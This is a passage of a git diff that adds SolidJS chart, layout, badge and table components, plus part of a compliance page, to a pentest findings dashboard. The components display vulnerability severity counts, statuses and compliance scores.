+  high: "#ea580c",
+  medium: "#ca8a04",
+  low: "#2563eb",
+  info: "#6b7280",
+}
+
+export const SeverityPie: Component<SeverityPieProps> = (props) => {
+  const size = () => props.size || 200
+  const center = () => size() / 2
+  const radius = () => size() / 2 - 10
+
+  const segments = createMemo(() => {
+    const total = Object.values(props.data).reduce((a, b) => a + b, 0)
+    if (total === 0) return []
+
+    const result: Array<{
+      severity: string
+      value: number
+      percentage: number
+      startAngle: number
+      endAngle: number
+      color: string
+    }> = []
+
+    let currentAngle = -90 // Start at top
+
+    const order = ["critical", "high", "medium", "low", "info"]
+    for (const severity of order) {
+      const value = props.data[severity] || 0
+      if (value === 0) continue
+
+      const percentage = (value / total) * 100
+      const angle = (value / total) * 360
+
+      result.push({
+        severity,
+        value,
+        percentage,
+        startAngle: currentAngle,
+        endAngle: currentAngle + angle,
+        color: severityColors[severity as keyof typeof severityColors] || "#6b7280",
+      })
+
+      currentAngle += angle
+    }
+
+    return result
+  })
+
+  const describeArc = (startAngle: number, endAngle: number) => {
+    const start = polarToCartesian(center(), center(), radius(), endAngle)
+    const end = polarToCartesian(center(), center(), radius(), startAngle)
+    const largeArcFlag = endAngle - startAngle <= 180 ? "0" : "1"
+
+    return [
+      "M", center(), center(),
+      "L", start.x, start.y,
+      "A", radius(), radius(), 0, largeArcFlag, 0, end.x, end.y,
+      "Z"
+    ].join(" ")
+  }
+
+  const polarToCartesian = (cx: number, cy: number, r: number, angle: number) => {
+    const rad = (angle * Math.PI) / 180
+    return {
+      x: cx + r * Math.cos(rad),
+      y: cy + r * Math.sin(rad),
+    }
+  }
+
+  const total = createMemo(() => Object.values(props.data).reduce((a, b) => a + b, 0))
+
+  return (
+    <div class="flex items-center gap-4">
+      <svg width={size()} height={size()} class="transform -rotate-0">
+        {total() === 0 ? (
+          <circle
+            cx={center()}
+            cy={center()}
+            r={radius()}
+            fill="none"
+            stroke="#374151"
+            stroke-width="2"
+          />
+        ) : (
+          <For each={segments()}>
+            {(segment) => (
+              <path
+                d={describeArc(segment.startAngle, segment.endAngle)}
+                fill={segment.color}
+                stroke="#1f2937"
+                stroke-width="1"
+              >
+                <title>{segment.severity}: {segment.value} ({segment.percentage.toFixed(1)}%)</title>
+              </path>
+            )}
+          </For>
+        )}
+        {/* Center hole for donut effect */}
+        <circle cx={center()} cy={center()} r={radius() * 0.6} fill="#1f2937" />
+        {/* Center text */}
+        <text
+          x={center()}
+          y={center() - 8}
+          text-anchor="middle"
+          class="fill-gray-100 text-2xl font-bold"
+        >
+          {total()}
+        </text>
+        <text
+          x={center()}
+          y={center() + 12}
+          text-anchor="middle"
+          class="fill-gray-400 text-xs"
+        >
+          Findings
+        </text>
+      </svg>
+
+      {/* Legend */}
+      <div class="space-y-2">
+        <For each={segments()}>
+          {(segment) => (
+            <div class="flex items-center gap-2 text-sm">
+              <div
+                class="w-3 h-3 rounded-full"
+                style={{ "background-color": segment.color }}
+              />
+              <span class="text-gray-400 capitalize">{segment.severity}:</span>
+              <span class="text-gray-100 font-medium">{segment.value}</span>
+            </div>
+          )}
+        </For>
+      </div>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/charts/StatusBar.tsx b/packages/opencode/src/dashboard/src/components/charts/StatusBar.tsx
new file mode 100644
index 00000000000..2b7d8919499
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/charts/StatusBar.tsx
@@ -0,0 +1,94 @@
+import { Component, createMemo, For, Show } from "solid-js"
+
+interface StatusBarProps {
+  data: Record<string, number>
+  height?: number
+}
+
+const statusColors: Record<string, string> = {
+  open: "#ef4444",
+  confirmed: "#f97316",
+  mitigated: "#22c55e",
+  false_positive: "#6b7280",
+  // Compliance
+  pass: "#22c55e",
+  fail: "#ef4444",
+  partial: "#eab308",
+  not_assessed: "#6b7280",
+}
+
+const statusLabels: Record<string, string> = {
+  open: "Open",
+  confirmed: "Confirmed",
+  mitigated: "Mitigated",
+  false_positive: "False Positive",
+  pass: "Pass",
+  fail: "Fail",
+  partial: "Partial",
+  not_assessed: "Not Assessed",
+}
+
+export const StatusBar: Component<StatusBarProps> = (props) => {
+  const height = () => props.height || 24
+
+  const total = createMemo(() => {
+    return Object.values(props.data).reduce((a, b) => a + b, 0)
+  })
+
+  const segments = createMemo(() => {
+    if (total() === 0) return []
+
+    return Object.entries(props.data)
+      .filter(([_, value]) => value > 0)
+      .map(([status, value]) => ({
+        status,
+        value,
+        percentage: (value / total()) * 100,
+        color: statusColors[status] || "#6b7280",
+        label: statusLabels[status] || status,
+      }))
+  })
+
+  return (
+    <div class="space-y-2">
+      {/* Bar */}
+      <div
+        class="w-full rounded-full overflow-hidden flex"
+        style={{ height: `${height()}px` }}
+      >
+        <Show when={total() === 0}>
+          <div class="w-full bg-gray-700" />
+        </Show>
+        <For each={segments()}>
+          {(segment) => (
+            <div
+              class="h-full transition-all duration-300"
+              style={{
+                width: `${segment.percentage}%`,
+                "background-color": segment.color,
+              }}
+              title={`${segment.label}: ${segment.value} (${segment.percentage.toFixed(1)}%)`}
+            />
+          )}
+        </For>
+      </div>
+
+      {/* Legend */}
+      <div class="flex flex-wrap gap-4 text-sm">
+        <For each={segments()}>
+          {(segment) => (
+            <div class="flex items-center gap-2">
+              <div
+                class="w-3 h-3 rounded-full"
+                style={{ "background-color": segment.color }}
+              />
+              <span class="text-gray-400">{segment.label}:</span>
+              <span class="text-gray-100 font-medium">{segment.value}</span>
+              <span class="text-gray-500">({segment.percentage.toFixed(0)}%)</span>
+            </div>
+          )}
+        </For>
+      </div>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/charts/TrendLine.tsx b/packages/opencode/src/dashboard/src/components/charts/TrendLine.tsx
new file mode 100644
index 00000000000..a1866ba6346
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/charts/TrendLine.tsx
@@ -0,0 +1,158 @@
+import { Component, createMemo, For } from "solid-js"
+
+interface TrendData {
+  date: string
+  created: number
+  mitigated: number
+}
+
+interface TrendLineProps {
+  data: TrendData[]
+  height?: number
+}
+
+export const TrendLine: Component<TrendLineProps> = (props) => {
+  const height = () => props.height || 200
+  const width = 600
+  const padding = { top: 20, right: 20, bottom: 30, left: 40 }
+
+  const chartWidth = width - padding.left - padding.right
+  const chartHeight = () => height() - padding.top - padding.bottom
+
+  const maxValue = createMemo(() => {
+    let max = 0
+    for (const d of props.data) {
+      max = Math.max(max, d.created, d.mitigated)
+    }
+    return Math.max(max, 1)
+  })
+
+  const scaleX = (index: number) => {
+    if (props.data.length <= 1) return padding.left + chartWidth / 2
+    return padding.left + (index / (props.data.length - 1)) * chartWidth
+  }
+
+  const scaleY = (value: number) => {
+    return padding.top + chartHeight() - (value / maxValue()) * chartHeight()
+  }
+
+  const createdPath = createMemo(() => {
+    if (props.data.length === 0) return ""
+    return props.data
+      .map((d, i) => `${i === 0 ? "M" : "L"} ${scaleX(i)} ${scaleY(d.created)}`)
+      .join(" ")
+  })
+
+  const mitigatedPath = createMemo(() => {
+    if (props.data.length === 0) return ""
+    return props.data
+      .map((d, i) => `${i === 0 ? "M" : "L"} ${scaleX(i)} ${scaleY(d.mitigated)}`)
+      .join(" ")
+  })
+
+  // Y-axis ticks
+  const yTicks = createMemo(() => {
+    const max = maxValue()
+    const step = Math.ceil(max / 4)
+    const ticks = []
+    for (let i = 0; i <= max; i += step) {
+      ticks.push(i)
+    }
+    return ticks
+  })
+
+  return (
+    <div class="overflow-x-auto">
+      <svg width={width} height={height()} class="text-gray-400">
+        {/* Grid lines */}
+        <For each={yTicks()}>
+          {(tick) => (
+            <g>
+              <line
+                x1={padding.left}
+                y1={scaleY(tick)}
+                x2={width - padding.right}
+                y2={scaleY(tick)}
+                stroke="#374151"
+                stroke-dasharray="2,2"
+              />
+              <text
+                x={padding.left - 8}
+                y={scaleY(tick) + 4}
+                text-anchor="end"
+                class="text-xs fill-gray-500"
+              >
+                {tick}
+              </text>
+            </g>
+          )}
+        </For>
+
+        {/* X-axis labels (show every 7th for readability) */}
+        <For each={props.data.filter((_, i) => i % 7 === 0 || i === props.data.length - 1)}>
+          {(d, index) => {
+            const actualIndex = props.data.indexOf(d)
+            return (
+              <text
+                x={scaleX(actualIndex)}
+                y={height() - 8}
+                text-anchor="middle"
+                class="text-xs fill-gray-500"
+              >
+                {new Date(d.date).toLocaleDateString("en-US", { month: "short", day: "numeric" })}
+              </text>
+            )
+          }}
+        </For>
+
+        {/* Created line */}
+        <path
+          d={createdPath()}
+          fill="none"
+          stroke="#ef4444"
+          stroke-width="2"
+        />
+
+        {/* Mitigated line */}
+        <path
+          d={mitigatedPath()}
+          fill="none"
+          stroke="#22c55e"
+          stroke-width="2"
+        />
+
+        {/* Data points */}
+        <For each={props.data}>
+          {(d, i) => (
+            <g>
+              <circle
+                cx={scaleX(i())}
+                cy={scaleY(d.created)}
+                r="3"
+                fill="#ef4444"
+              >
+                <title>{d.date}: {d.created} created</title>
+              </circle>
+              <circle
+                cx={scaleX(i())}
+                cy={scaleY(d.mitigated)}
+                r="3"
+                fill="#22c55e"
+              >
+                <title>{d.date}: {d.mitigated} mitigated</title>
+              </circle>
+            </g>
+          )}
+        </For>
+
+        {/* Legend */}
+        <g transform={`translate(${padding.left}, ${padding.top - 5})`}>
+          <circle cx="0" cy="0" r="4" fill="#ef4444" />
+          <text x="8" y="4" class="text-xs fill-gray-400">Created</text>
+          <circle cx="80" cy="0" r="4" fill="#22c55e" />
+          <text x="88" y="4" class="text-xs fill-gray-400">Mitigated</text>
+        </g>
+      </svg>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/layout/Header.tsx b/packages/opencode/src/dashboard/src/components/layout/Header.tsx
new file mode 100644
index 00000000000..3bc484d0f43
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/layout/Header.tsx
@@ -0,0 +1,46 @@
+import { Component, Show } from "solid-js"
+
+interface HeaderProps {
+  connected: boolean
+}
+
+export const Header: Component<HeaderProps> = (props) => {
+  return (
+    <header class="h-16 bg-gray-800 border-b border-gray-700 flex items-center justify-between px-6">
+      {/* Left side - Page title could go here */}
+      <div class="flex items-center gap-4">
+        <h1 class="text-lg font-semibold text-gray-100">Security Dashboard</h1>
+      </div>
+
+      {/* Right side */}
+      <div class="flex items-center gap-4">
+        {/* Connection status */}
+        <div class="flex items-center gap-2">
+          <div
+            class={`w-2 h-2 rounded-full ${props.connected ? "bg-green-500" : "bg-red-500"}`}
+            title={props.connected ? "Connected" : "Disconnected"}
+          />
+          <span class="text-sm text-gray-400">
+            {props.connected ? "Live" : "Offline"}
+          </span>
+        </div>
+
+        {/* Refresh button */}
+        <button
+          class="p-2 text-gray-400 hover:text-gray-100 hover:bg-gray-700 rounded-lg transition-colors"
+          title="Refresh data"
+          onClick={() => window.location.reload()}
+        >
+          <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15" />
+          </svg>
+        </button>
+
+        {/* Time */}
+        <div class="text-sm text-gray-400">
+          {new Date().toLocaleTimeString()}
+        </div>
+      </div>
+    </header>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/layout/Layout.tsx b/packages/opencode/src/dashboard/src/components/layout/Layout.tsx
new file mode 100644
index 00000000000..2935c93b4ff
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/layout/Layout.tsx
@@ -0,0 +1,28 @@
+import { Component, JSX } from "solid-js"
+import { Sidebar } from "./Sidebar"
+import { Header } from "./Header"
+
+interface LayoutProps {
+  children: JSX.Element
+  connected: boolean
+}
+
+export const Layout: Component<LayoutProps> = (props) => {
+  return (
+    <div class="flex h-screen bg-gray-900">
+      {/* Sidebar */}
+      <Sidebar />
+
+      {/* Main content */}
+      <div class="flex-1 flex flex-col overflow-hidden">
+        {/* Header */}
+        <Header connected={props.connected} />
+
+        {/* Page content */}
+        <main class="flex-1 overflow-y-auto p-6">
+          {props.children}
+        </main>
+      </div>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/layout/Sidebar.tsx b/packages/opencode/src/dashboard/src/components/layout/Sidebar.tsx
new file mode 100644
index 00000000000..fb80b978b21
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/layout/Sidebar.tsx
@@ -0,0 +1,69 @@
+import { Component } from "solid-js"
+import { A, useLocation } from "@solidjs/router"
+
+interface NavItem {
+  path: string
+  label: string
+  icon: string
+}
+
+const navItems: NavItem[] = [
+  { path: "/", label: "Dashboard", icon: "M3 12l2-2m0 0l7-7 7 7M5 10v10a1 1 0 001 1h3m10-11l2 2m-2-2v10a1 1 0 01-1 1h-3m-6 0a1 1 0 001-1v-4a1 1 0 011-1h2a1 1 0 011 1v4a1 1 0 001 1m-6 0h6" },
+  { path: "/findings", label: "Findings", icon: "M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z" },
+  { path: "/scans", label: "Scans", icon: "M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-3 7h3m-3 4h3m-6-4h.01M9 16h.01" },
+  { path: "/monitors", label: "Monitors", icon: "M15 12a3 3 0 11-6 0 3 3 0 016 0z M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z" },
+  { path: "/compliance", label: "Compliance", icon: "M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z" },
+  { path: "/reports", label: "Reports", icon: "M9 17v-2m3 2v-4m3 4v-6m2 10H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z" },
+]
+
+export const Sidebar: Component = () => {
+  const location = useLocation()
+
+  const isActive = (path: string) => {
+    if (path === "/") {
+      return location.pathname === "/" || location.pathname === "/dashboard" || location.pathname === "/dashboard/"
+    }
+    return location.pathname.startsWith(path)
+  }
+
+  return (
+    <aside class="w-64 bg-gray-800 border-r border-gray-700 flex flex-col">
+      {/* Logo */}
+      <div class="h-16 flex items-center px-4 border-b border-gray-700">
+        <div class="flex items-center gap-3">
+          <div class="w-8 h-8 bg-blue-600 rounded-lg flex items-center justify-center">
+            <svg class="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+              <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z" />
+            </svg>
+          </div>
+          <div>
+            <div class="font-semibold text-gray-100">CyxWiz</div>
+            <div class="text-xs text-gray-400">Pentest Dashboard</div>
+          </div>
+        </div>
+      </div>
+
+      {/* Navigation */}
+      <nav class="flex-1 py-4 px-2 space-y-1">
+        {navItems.map((item) => (
+          <A
+            href={item.path}
+            class={`nav-link ${isActive(item.path) ? "nav-link-active" : ""}`}
+          >
+            <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+              <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d={item.icon} />
+            </svg>
+            <span>{item.label}</span>
+          </A>
+        ))}
+      </nav>
+
+      {/* Footer */}
+      <div class="p-4 border-t border-gray-700">
+        <div class="text-xs text-gray-500 text-center">
+          Phase 17 - Security Dashboard
+        </div>
+      </div>
+    </aside>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/shared/DataTable.tsx b/packages/opencode/src/dashboard/src/components/shared/DataTable.tsx
new file mode 100644
index 00000000000..3c5494c2a7c
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/shared/DataTable.tsx
@@ -0,0 +1,74 @@
+import { Component, For, JSX, Show } from "solid-js"
+
+export interface Column<T> {
+  key: string
+  header: string
+  width?: string
+  render?: (item: T) => JSX.Element
+}
+
+interface DataTableProps<T> {
+  columns: Column<T>[]
+  data: T[]
+  loading?: boolean
+  emptyMessage?: string
+  onRowClick?: (item: T) => void
+  keyField?: keyof T
+}
+
+export function DataTable<T extends Record<string, any>>(props: DataTableProps<T>) {
+  return (
+    <div class="overflow-x-auto">
+      <table class="table">
+        <thead>
+          <tr>
+            <For each={props.columns}>
+              {(column) => (
+                <th style={{ width: column.width }}>{column.header}</th>
+              )}
+            </For>
+          </tr>
+        </thead>
+        <tbody>
+          <Show when={props.loading}>
+            <tr>
+              <td colspan={props.columns.length} class="text-center py-8">
+                <div class="flex items-center justify-center gap-2">
+                  <div class="animate-spin rounded-full h-5 w-5 border-b-2 border-blue-500"></div>
+                  <span class="text-gray-400">Loading...</span>
+                </div>
+              </td>
+            </tr>
+          </Show>
+
+          <Show when={!props.loading && props.data.length === 0}>
+            <tr>
+              <td colspan={props.columns.length} class="text-center py-8 text-gray-400">
+                {props.emptyMessage || "No data available"}
+              </td>
+            </tr>
+          </Show>
+
+          <Show when={!props.loading && props.data.length > 0}>
+            <For each={props.data}>
+              {(item) => (
+                <tr
+                  class={props.onRowClick ? "cursor-pointer hover:bg-gray-750" : ""}
+                  onClick={() => props.onRowClick?.(item)}
+                >
+                  <For each={props.columns}>
+                    {(column) => (
+                      <td>
+                        {column.render ? column.render(item) : item[column.key]}
+                      </td>
+                    )}
+                  </For>
+                </tr>
+              )}
+            </For>
+          </Show>
+        </tbody>
+      </table>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/shared/SeverityBadge.tsx b/packages/opencode/src/dashboard/src/components/shared/SeverityBadge.tsx
new file mode 100644
index 00000000000..baebb4c2449
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/shared/SeverityBadge.tsx
@@ -0,0 +1,27 @@
+import { Component } from "solid-js"
+
+interface SeverityBadgeProps {
+  severity: "critical" | "high" | "medium" | "low" | "info"
+  size?: "sm" | "md"
+}
+
+const severityConfig = {
+  critical: { bg: "bg-red-900", text: "text-red-200", label: "Critical" },
+  high: { bg: "bg-orange-900", text: "text-orange-200", label: "High" },
+  medium: { bg: "bg-yellow-900", text: "text-yellow-200", label: "Medium" },
+  low: { bg: "bg-blue-900", text: "text-blue-200", label: "Low" },
+  info: { bg: "bg-gray-700", text: "text-gray-300", label: "Info" },
+}
+
+export const SeverityBadge: Component<SeverityBadgeProps> = (props) => {
+  const config = () => severityConfig[props.severity] || severityConfig.info
+  const sizeClasses = () => props.size === "sm" ? "px-2 py-0.5 text-xs" : "px-2.5 py-0.5 text-xs"
+
+  return (
+    <span
+      class={`badge ${config().bg} ${config().text} ${sizeClasses()}`}
+    >
+      {config().label}
+    </span>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/shared/StatusBadge.tsx b/packages/opencode/src/dashboard/src/components/shared/StatusBadge.tsx
new file mode 100644
index 00000000000..801dd85d3d4
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/shared/StatusBadge.tsx
@@ -0,0 +1,41 @@
+import { Component } from "solid-js"
+
+interface StatusBadgeProps {
+  status: "open" | "confirmed" | "mitigated" | "false_positive" | string
+  size?: "sm" | "md"
+}
+
+const statusConfig: Record<string, { bg: string; text: string; label: string }> = {
+  open: { bg: "bg-red-900", text: "text-red-200", label: "Open" },
+  confirmed: { bg: "bg-orange-900", text: "text-orange-200", label: "Confirmed" },
+  mitigated: { bg: "bg-green-900", text: "text-green-200", label: "Mitigated" },
+  false_positive: { bg: "bg-gray-700", text: "text-gray-300", label: "False Positive" },
+  // Monitor statuses
+  active: { bg: "bg-green-900", text: "text-green-200", label: "Active" },
+  paused: { bg: "bg-yellow-900", text: "text-yellow-200", label: "Paused" },
+  disabled: { bg: "bg-gray-700", text: "text-gray-300", label: "Disabled" },
+  error: { bg: "bg-red-900", text: "text-red-200", label: "Error" },
+  // Run statuses
+  running: { bg: "bg-blue-900", text: "text-blue-200", label: "Running" },
+  completed: { bg: "bg-green-900", text: "text-green-200", label: "Completed" },
+  failed: { bg: "bg-red-900", text: "text-red-200", label: "Failed" },
+  cancelled: { bg: "bg-gray-700", text: "text-gray-300", label: "Cancelled" },
+  // Compliance statuses
+  pass: { bg: "bg-green-900", text: "text-green-200", label: "Pass" },
+  fail: { bg: "bg-red-900", text: "text-red-200", label: "Fail" },
+  partial: { bg: "bg-yellow-900", text: "text-yellow-200", label: "Partial" },
+  not_assessed: { bg: "bg-gray-700", text: "text-gray-300", label: "Not Assessed" },
+}
+
+export const StatusBadge: Component<StatusBadgeProps> = (props) => {
+  const config = () => statusConfig[props.status] || { bg: "bg-gray-700", text: "text-gray-300", label: props.status }
+  const sizeClasses = () => props.size === "sm" ? "px-2 py-0.5 text-xs" : "px-2.5 py-0.5 text-xs"
+
+  return (
+    <span
+      class={`badge ${config().bg} ${config().text} ${sizeClasses()}`}
+    >
+      {config().label}
+    </span>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/index.tsx b/packages/opencode/src/dashboard/src/index.tsx
new file mode 100644
index 00000000000..d8f1fb93108
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/index.tsx
@@ -0,0 +1,11 @@
+import { render } from "solid-js/web"
+import { App } from "./App"
+import "./styles/dashboard.css"
+
+const root = document.getElementById("root")
+
+if (!root) {
+  throw new Error("Root element not found")
+}
+
+render(() => <App />, root)
diff --git a/packages/opencode/src/dashboard/src/pages/Compliance.tsx b/packages/opencode/src/dashboard/src/pages/Compliance.tsx
new file mode 100644
index 00000000000..bcd8022c2a3
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Compliance.tsx
@@ -0,0 +1,356 @@
+import { Component, createSignal, createEffect, Show, For } from "solid-js"
+import { useParams } from "@solidjs/router"
+import {
+  complianceApi,
+  type ComplianceFramework,
+  type ComplianceControl,
+  type ComplianceAssessment,
+} from "../api/client"
+import { StatusBadge } from "../components/shared/StatusBadge"
+import { ComplianceRadar } from "../components/charts/ComplianceRadar"
+import { StatusBar } from "../components/charts/StatusBar"
+
+const Compliance: Component = () => {
+  const params = useParams()
+
+  const [frameworks, setFrameworks] = createSignal<ComplianceFramework[]>([])
+  const [selectedFramework, setSelectedFramework] = createSignal<ComplianceFramework | null>(null)
+  const [controls, setControls] = createSignal<ComplianceControl[]>([])
+  const [categories, setCategories] = createSignal<Array<{ id: string; name: string; description?: string }>>([])
+  const [assessment, setAssessment] = createSignal<ComplianceAssessment | null>(null)
+  const [loading, setLoading] = createSignal(true)
+  const [assessing, setAssessing] = createSignal(false)
+  const [error, setError] = createSignal<string | null>(null)
+  const [selectedCategory, setSelectedCategory] = createSignal<string | null>(null)
+
+  const fetchFrameworks = async () => {
+    setLoading(true)
+    const result = await complianceApi.listFrameworks()
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setFrameworks(result.data.frameworks)
+    }
+
+    setLoading(false)
+  }
+
+  const selectFramework = async (frameworkId: string) => {
+    setLoading(true)
+    setAssessment(null)
+    setSelectedCategory(null)
+
+    const framework = frameworks().find((f) => f.id === frameworkId)
+    setSelectedFramework(framework || null)
+
+    const result = await complianceApi.getFramework(frameworkId)
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setControls(result.data.controls)
+      setCategories(result.data.categories)
+    }
+
+    setLoading(false)
+  }
+
+  const runAssessment = async () => {
+    if (!selectedFramework()) return
+
+    setAssessing(true)
+    setError(null)
+
+    const result = await complianceApi.assess(selectedFramework()!.id)
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setAssessment(result.data.assessment)
+    }
+
+    setAssessing(false)
+  }
+
+  createEffect(() => {
+    fetchFrameworks()
+  })
+
+  createEffect(() => {
+    if (params.framework) {
+      selectFramework(params.framework)
+    }
+  })
+
+  const getControlsByCategory = (categoryId: string) => {
+    return controls().filter((c) => c.category === categoryId)
+  }
+
+  const getAssessmentForControl = (controlId: string) => {
+    if (!assessment()) return null
+    return assessment()!.controls.find((c) => c.control.id === controlId)
+  }
+
+  const getCategoryScore = (categoryId: string) => {
+    if (!assessment()) return null
+
+    const categoryControls = assessment()!.controls.filter((c) => c.control.category === categoryId)
+    const passed = categoryControls.filter((c) => c.status === "pass").length
+    const failed = categoryControls.filter((c) => c.status === "fail").length
+    const partial = categoryControls.filter((c) => c.status === "partial").length
+    const total = categoryControls.length
+
+    if (total === 0) return null
+
+    return {
+      passed,
+      failed,
+      partial,
+      total,
+      percentage: Math.round(((passed + partial * 0.5) / total) * 100),
+    }
+  }
+
+  const getRadarData = () => {
+    if (!assessment()) return []
+
+    return categories().map((cat) => {
+      const score = getCategoryScore(cat.id)
+      return {
+        category: cat.id,
+        name: cat.name,
+        percentage: score?.percentage || 0,
+      }
+    })
+  }
+
+  return (
+    <div class="space-y-6">
+      {/* Header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Compliance</h1>
+          <p class="text-gray-400 mt-1">Map findings to compliance frameworks</p>
+        </div>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      {/* Framework selection */}
+      <div class="card">
+        <div class="card-header">Select Framework</div>
+        <div class="grid grid-cols-1 md:grid-cols-3 gap-4">
+          <For each={frameworks()}>
+            {(framework) => (
+              <button
+                onClick={() => selectFramework(framework.id)}
+                class={`p-4 rounded-lg border text-left transition-all ${
+                  selectedFramework()?.id === framework.id
+                    ? "border-blue-500 bg-blue-900/20"
+                    : "border-gray-700 hover:border-gray-600"
+                }`}
+              >
+                <div class="font-medium text-gray-100">{framework.name}</div>
+                <div class="text-sm text-gray-400 mt-1">v{framework.version}</div>
+                <div class="text-xs text-gray-500 mt-2">
+                  {framework.controlCount} controls
+                </div>
+              </button>
+            )}
+          </For>
+        </div>
+      </div>
+
+      <Show when={selectedFramework()}>
+        {/* Assessment panel */}
+        <div class="card">
+          <div class="flex items-center justify-between mb-4">
+            <div>
+              <h3 class="text-lg font-semibold text-gray-100">
+                {selectedFramework()!.name} Assessment
+              </h3>
+              <p class="text-sm text-gray-400 mt-1">{selectedFramework()!.description}</p>
+            </div>
+            <button
+              onClick={runAssessment}
+              disabled={assessing()}
+              class="btn btn-primary disabled:opacity-50"
+            >
+              {assessing() ? (
+                <span class="flex items-center gap-2">
+                  <div class="animate-spin rounded-full h-4 w-4 border-b-2 border-white"></div>
+                  Assessing...
+                </span>
+              ) : assessment() ? (
+                "Re-run Assessment"
+              ) : (
+                "Run Assessment"
+              )}
+            </button>
+          </div>
+
+          <Show when={assessment()}>
+            {/* Score overview */}
+            <div class="grid grid-cols-1 lg:grid-cols-2 gap-6 mb-6">
+              {/* Overall score */}
+              <div class="bg-gray-900 rounded-lg p-6">
+                <div class="text-center mb-4">
+                  <div
+                    class={`text-5xl font-bold ${
+                      assessment()!.score.percentage >= 80
+                        ? "text-green-400"
+                        : assessment()!.score.percentage >= 50
+                        ? "text-yellow-400"
+                        : "text-red-400"
+                    }`}
+                  >
+                    {assessment()!.score.percentage}%
+                  </div>
+                  <div class="text-gray-400 mt-2">Overall Compliance Score</div>
+                </div>
+                <StatusBar
+                  data={{
+                    pass: assessment()!.score.passed,
+                    partial: assessment()!.score.partial,
+                    fail: assessment()!.score.failed,
+                    not_assessed: assessment()!.score.notAssessed,
+                  }}
+                  height={24}
+                />
+              </div>
+
+              {/* Radar chart */}
+              <div class="bg-gray-900 rounded-lg p-4">
+                <ComplianceRadar data={getRadarData()} size={280} />
+              </div>
+            </div>
+
+            {/* Category scores */}
+            <div class="space-y-2">
+              <div class="text-sm text-gray-400 mb-2">Categories</div>
+              <For each={categories()}>
+                {(category) => {
+                  const score = getCategoryScore(category.id)
+                  return (
+                    <button
+                      onClick={() =>
+                        setSelectedCategory(selectedCategory() === category.id ? null : category.id)
+                      }
+                      class={`w-full p-3 rounded-lg border text-left transition-all ${
+                        selectedCategory() === category.id
+                          ? "border-blue-500 bg-blue-900/20"
+                          : "border-gray-700 hover:border-gray-600"
+                      }`}
+                    >
+                      <div class="flex items-center justify-between">
+                        <div>
+                          <div class="font-medium text-gray-100">
+                            {category.id}. {category.name}
+                          </div>
+                          <Show when={category.description}>
+                            <div class="text-xs text-gray-500 mt-1">{category.description}</div>
+                          </Show>
+                        </div>
+                        <Show when={score}>
+                          <div class="flex items-center gap-4">
+                            <div class="text-sm text-gray-400">
+                              {score!.passed}/{score!.total} passed
+                            </div>
+                            <div
+                              class={`text-lg font-bold ${
+                                score!.percentage >= 80
+                                  ? "text-green-400"
+                                  : score!.percentage >= 50
+                                  ? "text-yellow-400"
+                                  : "text-red-400"
+                              }`}
+                            >
+                              {score!.percentage}%
+                            </div>
+                          </div>
+                        </Show>
+                      </div>
+
+                      {/* Expanded controls */}
+                      <Show when={selectedCategory() === category.id}>
+                        <div class="mt-4 space-y-2 border-t border-gray-700 pt-4">
+                          <For each={getControlsByCategory(category.id)}>
+                            {(control) => {
+                              const controlAssessment = getAssessmentForControl(control.id)
+                              return (
+                                <div class="bg-gray-800 p-3 rounded">
